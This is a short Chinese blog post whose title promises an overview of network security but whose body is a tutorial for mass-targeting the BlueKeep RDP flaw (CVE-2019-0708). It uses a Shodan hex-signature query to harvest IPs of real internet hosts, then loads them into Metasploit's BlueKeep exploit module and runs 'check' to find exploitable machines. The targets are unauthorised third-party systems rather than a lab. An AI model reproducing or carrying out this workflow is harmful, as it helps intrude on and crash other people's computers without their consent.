0
点赞
收藏
分享

微信扫一扫

浅析大数据时代下的网络安全

洲行 2024-12-02 阅读 21

目录

批量查找CVE-2019-0708漏洞

简述:

漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的,导致机器蓝屏瘫痪。

输入命令:

shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

用16进制是因为shodan search vuln:cve -2019-0708 命令对于学术账号无权限使用,需要注册更高一级账户

查到ip和对应端口后,通过 shodan host ip 来验证是否存在该漏洞,如下所示,这个ip则存在CVE-2019-0708漏洞


扫描下来的ip可以放到文档里(注意把端口删掉),利用windows自带远程桌面连接尝试连接


回到kali,输入msfconsole,再输入search 0708 查找此漏洞

输入以下命令启用这个模块

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

输入show options显示选项


然后输入 set rhosts file: 上述存放ip的文档路径

这里可以直接把文件托进命令面板


再输入check检查,带* 号的不能利用,带+号的可以利用


输入show targets可以查看利用的版本


输入exit退出

举报

相关推荐

0 条评论